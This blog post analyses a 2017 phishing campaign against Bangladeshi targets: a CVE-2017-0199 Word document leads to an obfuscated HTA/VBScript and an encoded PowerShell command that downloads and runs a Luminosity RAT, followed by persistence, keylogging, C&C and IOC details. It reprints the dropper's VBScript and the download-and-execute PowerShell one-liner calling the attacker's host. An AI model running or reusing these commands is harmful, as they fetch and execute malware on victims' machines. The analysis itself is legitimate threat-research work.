APT attack in Bangladesh

One of my friends from Bangladesh, @rudr4_sarkar, sent me this link to analyze, which leads to a Word document.
http://mozillatm.com/A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc

VirusTotal: https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/

I figured out that this was the CVE-2017-0199 exploit. It was simple to find the payload.

b = '00000068007400740070003a002f002f006d006f007a0069006c006c00610074006d002e0063006f006d002f006c006f006100640069006e0067002e00680074006d006c00000000'

"".join("{0}".format((i+j).replace('00','').decode('hex')) for i, j in zip(b[::2], b[1::2]))

>> 'http://mozillatm.com/loading.html'

This exploit will deliver a malicious HTA file and execute it. HTA means IE, so yeah VBScript will execute nicely.

Once we visit this page we can see the obfuscated VBScript which will execute PowerShell and drop the malware on the system.

You can view the source from here: https://pastebin.com/kt3LNwiw
This part of the code seems to be interesting.

fuNctioN gJSoYXXAVqwD()

	DIM taCXnLuJDFFL

	taCXnLuJDFFL = cHRW(34) 
	 CReaTEoBJecT(HLJlzxWsFMxQ(CGUgZBJuvRsW("V1RzVENUUlRJVHBUVFQuVHNUaFRlVExUTFQ="))).expANdEnVIRoNMEnTSTrInGS(HLJlzxWsFMxQ(CGUgZBJuvRsW("JVpzWnlac1p0WmVaTVpSWm9ab1pUWiVa"))) 
	 HLJlzxWsFMxQ(CGUgZBJuvRsW("XGtTa3lrU2tUa0VrTWszazJrXGtXa2lrTmtEa29rV2tTa3Brb2tXa0Vrcmtza0hrRWtMa0xrXGt2azFrLmswa1xrcGtva3drZWtSa3NraGtFa0xrTGsua2VreGtFaw==")) 
	 ChRw(34)

	CreAtEOBJeCt(HLJlzxWsFMxQ(CGUgZBJuvRsW("d0FzQWNBckFJQXBBdEEuQXNBaEFFQWxBbEE="))).run taCXnLuJDFFL 
	 " POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen -EnCOdedCommAnD IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA== " , 0

eND fUnCtioN

Setting the obfuscation aside, if we debug the code the “taCXnLuJDFFL” variable will finally contain

""C:\Windows\SySTEM32\WiNDoWSpoWErsHELL\v1.0\poweRshELL.exE""

We could write pseudo code like this.

Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run  ""C:\Windows\SySTEM32\WiNDoWSpoWErsHELL\v1.0\poweRshELL.exE""  & " POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen -EnCOdedCommAnD IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA== " , 0

Once we decode the encoded command supplied to PowerShell we can see the malware being downloaded.

$EncodedText = "IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA=="
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
Write-Host $DecodedText

This is a PowerShell one-liner to drop the malware from http://mozillatm.com/loading.exe and save it to the %TMP% folder as “Chrometm.exe”.

(nEw-oBJECt SysTEM.NeT.WebcLieNT).DownLOADFiLE( ”http://mozillatm.com/loading.exe” , ”$Env:TMP\Chrometm.exe” ) ; sTArT ”$Env:tMP\Chrometm.exe”
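As an added example (not the author's code and not part of the malware), the same decoding done in Python 3 the way a triage script would: it pulls the base64 operand out of the PowerShell command line quoted above, decodes it as UTF-16LE and extracts the URL, drop paths and download method. It folds the typographic quotes (U+201D) the sample uses into plain quotes first, because PowerShell accepts them as string delimiters and a regex that only looks for `"` would miss the indicators. The command line is the one from the page; the regexes and function names are my own.

```python
import base64
import re

# The HTA's PowerShell command line as quoted on this page, used as sample input.
SAMPLE_CMDLINE = (
    "POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen "
    "-EnCOdedCommAnD "
    "IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA=="
)

# -EncodedCommand may be abbreviated to -e, -ec or -enc; the operand is base64.
ENCODED_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# PowerShell treats the typographic quotes U+201C/U+201D/U+201E as string
# delimiters, and this sample uses U+201D; fold them to '"' before matching.
SMART_QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u201e": '"'})

def find_encoded_command(cmdline: str):
    """Return the base64 operand of -EncodedCommand, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    return m.group(1) if m else None

def decode_encoded_command(b64: str) -> str:
    """The operand is base64 over the UTF-16LE bytes of the script text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")

def extract_indicators(script: str) -> dict:
    """Pull URLs, quoted drop paths and download methods out of a decoded script."""
    text = script.translate(SMART_QUOTES)
    methods = re.findall(r"\.(downloadfile|downloadstring|downloaddata)\s*\(", text, re.I)
    return {
        "urls": re.findall(r"https?://[^\s\"',)]+", text, re.I),
        "paths": re.findall(r'"(\$env:[^"]+|[a-z]:\\[^"]+)"', text, re.I),
        "methods": sorted({m.lower() for m in methods}),
    }

def triage(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and summarise what it does."""
    b64 = find_encoded_command(cmdline)
    if b64 is None:
        return {"encoded": False, "script": None, "indicators": None}
    script = decode_encoded_command(b64)
    return {"encoded": True, "script": script, "indicators": extract_indicators(script)}

if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print(result["script"])
    for key, values in result["indicators"].items():
        print(f"{key}: {values}")
```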

This malware is written in Visual Basic and is highly obfuscated. I submitted this sample to Malwr.com and you can view the complete analysis here. It seems the attackers are using Luminosity RAT.

https://malwr.com/analysis/YmJiNTEwYzE5OWFkNDZjYmFiNTY0OWZhMzA5YzgyOGY/

After running, it copies itself into the “Program Files” folder as “Mozillatm.exe”. We can check the autorun entries. There’s another exe, “Mozillatms.exe”, inside the “system32” folder; notice the ‘s’. It seemed to be a backup.

The copy inside “Program Files”.

However, I noticed something: on 64-bit machines the malware copies itself into the “C:\windows\SysWow64” folder instead, because a 32-bit process writing to system32 is redirected there by WoW64 file system redirection. So this autorun key won’t work on 64-bit machines, meaning the backup copy of the malware will fail under 64-bit.

“Mozillatm.exe” will be our malicious executable running.

This malware communicates with the C&C server at the IP address 162.248.92.28:131106.

This malware stores screenshots and keystroke logs and sends them to the C&C server. They are located inside %USERPROFILE%\AppData\Roaming\Mozillatms.

Keystroke logs can be found inside the “logs” folder.

The screenshot data is compressed using the deflate algorithm; in fact it has been compressed twice. It can, however, be decompressed easily.

I wrote a simple tool to perform compression and decompression using the deflate algorithm.

Deflate.exe “6.51 PM” output.jpg -d
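An added Python equivalent of the tool described above (not the author's Deflate.exe): it assumes each layer is a raw DEFLATE stream as produced by .NET's DeflateStream, falls back to zlib- or gzip-wrapped data, and keeps inflating until a JPEG header appears, so the number of layers does not have to be known in advance. The sample input is a constructed stand-in for a captured screenshot; the file names in the usage line are assumptions.

```python
import sys
import zlib

JPEG_MAGIC = b"\xff\xd8\xff"

def sample_screenshot() -> bytes:
    """Constructed stand-in for a captured screenshot: a minimal JPEG-like blob."""
    return JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + bytes(range(256)) * 4 + b"\xff\xd9"

def deflate_once(data: bytes) -> bytes:
    """Raw DEFLATE (no zlib/gzip header), as .NET's DeflateStream produces."""
    c = zlib.compressobj(level=9, wbits=-zlib.MAX_WBITS)
    return c.compress(data) + c.flush()

def inflate_once(data: bytes) -> bytes:
    """Inflate one layer: try raw DEFLATE first, then zlib- or gzip-wrapped."""
    for wbits in (-zlib.MAX_WBITS, zlib.MAX_WBITS | 32):
        try:
            return zlib.decompress(data, wbits)
        except zlib.error:
            continue
    raise ValueError("not a DEFLATE stream")

def deflate(data: bytes, rounds: int = 2) -> bytes:
    """Apply DEFLATE `rounds` times (the sample compresses screenshots twice)."""
    for _ in range(rounds):
        data = deflate_once(data)
    return data

def inflate_layers(data: bytes, max_rounds: int = 4) -> tuple:
    """Peel DEFLATE layers until a JPEG appears or nothing inflates further; returns
    (payload, layers_removed). No valid DEFLATE stream starts with 0xFF (BTYPE 11 is
    reserved), so the JPEG check cannot stop early on a compressed layer."""
    for rounds in range(max_rounds):
        if data.startswith(JPEG_MAGIC):
            return data, rounds
        try:
            data = inflate_once(data)
        except ValueError:
            return data, rounds
    return data, max_rounds

if __name__ == "__main__":
    # Usage mirrors the page's tool: python deflate.py <input> <output> [-d]
    src, dst, decompress = sys.argv[1], sys.argv[2], "-d" in sys.argv[3:]
    with open(src, "rb") as f:
        blob = f.read()
    out = inflate_layers(blob)[0] if decompress else deflate(blob)
    with open(dst, "wb") as f:
        f.write(out)
```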

This is an example screenshot taken by the malware.

Out of curiosity I had a look around the C&C IP address 162.248.92.28 and found it running a Squid proxy.

However, it uses HTTP authentication.

With a bit of Googling, I found that these domains are also used in variants of this attack with the same malware.

  • Bd2bd.com
  • Pc-net.org
  • Bd-pc.com
  • Registerbd.com

You can find more details by beetles.io on http://blog.beetles.io/2017/05/29/apt-rat-1/ and https://blog.beetles.io/2017/06/01/operation-brightroar-uncovering-more-attack-pattern/

The samples I’ve analyzed:

Filename: loading.exe
SHA256: 9865ccfe4dd0c893c88d24168425933e5663ee8861a3b360e1b10e63769f5392
https://virustotal.com/en/file/9865ccfe4dd0c893c88d24168425933e5663ee8861a3b360e1b10e63769f5392/analysis/1496541573/
https://malwr.com/analysis/YmJiNTEwYzE5OWFkNDZjYmFiNTY0OWZhMzA5YzgyOGY/

Filename: A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc
SHA256: 273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674
https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/


5 thoughts on “APT attack in Bangladesh”

  1. Good article Malith. The malware has added itself in the task and queries to 192.168.0.142? Any thought on this?

  2. Pingback: IT Security Weekend Catch Up – June 11, 2017 – BadCyber
